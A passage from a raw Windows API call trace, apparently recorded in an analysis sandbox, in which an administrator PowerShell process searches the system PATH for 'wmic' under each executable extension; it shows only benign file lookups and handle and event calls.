hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c8edfa8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c8edfa8*=0x62c) returned 1 [0248.232] CloseHandle (hObject=0x62c) returned 1 [0248.232] GetExitCodeProcess (in: hProcess=0x630, lpExitCode=0x1c8ee018 | out: lpExitCode=0x1c8ee018*=0x0) returned 1 [0248.232] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0248.233] CloseHandle (hObject=0x630) returned 1 [0248.234] SetEvent (hEvent=0x5fc) returned 1 [0248.234] SetEvent (hEvent=0x5f0) returned 1 [0248.234] SetEvent (hEvent=0x5f4) returned 1 [0248.234] SetEvent (hEvent=0x5f8) returned 1 [0248.234] SetEvent (hEvent=0x60c) returned 1 [0248.234] SetEvent (hEvent=0x600) returned 1 [0248.234] SetEvent (hEvent=0x604) returned 1 [0248.234] SetEvent (hEvent=0x608) returned 1 [0248.234] SetEvent (hEvent=0x610) returned 1 [0248.234] CoUninitialize () Thread: id = 180 os_tid = 0xb8c [0248.272] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0248.275] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0248.276] VirtualQuery (in: lpAddress=0x1c94d460, lpBuffer=0x1c94e320, dwLength=0x30 | out: lpBuffer=0x1c94e320*(BaseAddress=0x1c94d000, AllocationBase=0x1bfc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0248.277] VirtualQuery (in: lpAddress=0x1c94d710, lpBuffer=0x1c94e5d0, dwLength=0x30 | out: lpBuffer=0x1c94e5d0*(BaseAddress=0x1c94d000, AllocationBase=0x1bfc0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0248.280] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0248.280] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0248.280] CoTaskMemFree (pv=0x2af7b0) [0248.280] CoTaskMemAlloc (cb=0x104) returned 0x2af7b0 [0248.280] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2af7b0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0248.280] CoTaskMemFree (pv=0x2af7b0) [0248.280] CoTaskMemAlloc (cb=0x20e) returned 0x2bc6a0 [0248.280] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2bc6a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0248.280] CoTaskMemFree (pv=0x2bc6a0) [0248.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.281] SetErrorMode (uMode=0x1) returned 0x1 [0248.281] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.281] SetErrorMode (uMode=0x1) returned 0x1 [0248.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.282] SetErrorMode (uMode=0x1) returned 0x1 [0248.282] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.282] SetErrorMode (uMode=0x1) returned 0x1 [0248.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.282] SetErrorMode (uMode=0x1) returned 0x1 [0248.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.283] SetErrorMode (uMode=0x1) returned 0x1 [0248.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.283] SetErrorMode (uMode=0x1) returned 0x1 [0248.283] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.283] SetErrorMode (uMode=0x1) returned 0x1 [0248.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.284] SetErrorMode (uMode=0x1) returned 0x1 [0248.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.284] SetErrorMode (uMode=0x1) returned 0x1 [0248.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.284] SetErrorMode (uMode=0x1) returned 0x1 [0248.284] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.285] SetErrorMode (uMode=0x1) returned 0x1 [0248.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.285] SetErrorMode (uMode=0x1) returned 0x1 [0248.285] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.285] SetErrorMode (uMode=0x1) returned 0x1 [0248.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.286] SetErrorMode (uMode=0x1) returned 0x1 [0248.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.286] SetErrorMode (uMode=0x1) returned 0x1 [0248.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.286] SetErrorMode (uMode=0x1) returned 0x1 [0248.286] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.287] SetErrorMode (uMode=0x1) returned 0x1 [0248.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.287] SetErrorMode (uMode=0x1) returned 0x1 [0248.287] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.287] SetErrorMode (uMode=0x1) returned 0x1 [0248.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.288] SetErrorMode (uMode=0x1) returned 0x1 [0248.288] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.288] SetErrorMode (uMode=0x1) returned 0x1 [0248.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.289] SetErrorMode (uMode=0x1) returned 0x1 [0248.289] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.289] SetErrorMode (uMode=0x1) returned 0x1 [0248.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.289] SetErrorMode (uMode=0x1) returned 0x1 [0248.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.290] SetErrorMode (uMode=0x1) returned 0x1 [0248.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.290] SetErrorMode (uMode=0x1) returned 0x1 [0248.290] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.290] SetErrorMode (uMode=0x1) returned 0x1 [0248.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0248.291] SetErrorMode (uMode=0x1) returned 0x1 [0248.291] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.291] SetErrorMode (uMode=0x1) returned 0x1 [0248.291] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.291] SetErrorMode (uMode=0x1) returned 0x1 [0248.292] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.292] SetErrorMode (uMode=0x1) returned 0x1 [0248.292] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.292] SetErrorMode (uMode=0x1) returned 0x1 [0248.292] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.293] SetErrorMode (uMode=0x1) returned 0x1 [0248.293] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.293] SetErrorMode (uMode=0x1) returned 0x1 [0248.293] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.294] SetErrorMode (uMode=0x1) returned 0x1 [0248.294] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.294] SetErrorMode (uMode=0x1) returned 0x1 [0248.294] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.295] SetErrorMode (uMode=0x1) returned 0x1 [0248.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.295] SetErrorMode (uMode=0x1) returned 0x1 [0248.295] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.295] SetErrorMode (uMode=0x1) returned 0x1 [0248.295] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.296] SetErrorMode (uMode=0x1) returned 0x1 [0248.296] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.296] SetErrorMode (uMode=0x1) returned 0x1 [0248.296] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.297] SetErrorMode (uMode=0x1) returned 0x1 [0248.297] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.297] SetErrorMode (uMode=0x1) returned 0x1 [0248.297] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.297] SetErrorMode (uMode=0x1) returned 0x1 [0248.298] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.298] SetErrorMode (uMode=0x1) returned 0x1 [0248.298] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.298] SetErrorMode (uMode=0x1) returned 0x1 [0248.298] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.298] SetErrorMode (uMode=0x1) returned 0x1 [0248.299] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.299] SetErrorMode (uMode=0x1) returned 0x1 [0248.299] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.299] SetErrorMode (uMode=0x1) returned 0x1 [0248.299] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.299] SetErrorMode (uMode=0x1) returned 0x1 [0248.299] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.300] SetErrorMode (uMode=0x1) returned 0x1 [0248.300] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.300] SetErrorMode (uMode=0x1) returned 0x1 [0248.300] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.301] SetErrorMode (uMode=0x1) returned 0x1 [0248.301] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.301] SetErrorMode (uMode=0x1) returned 0x1 [0248.301] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c94d640 | out: lpFindFileData=0x1c94d640*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0248.301] SetErrorMode (uMode=0x1) returned 0x1 [0248.301] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c94d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0248.302] SetErrorMode (uMode=0x1) returned 0x1 [0248.302] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", 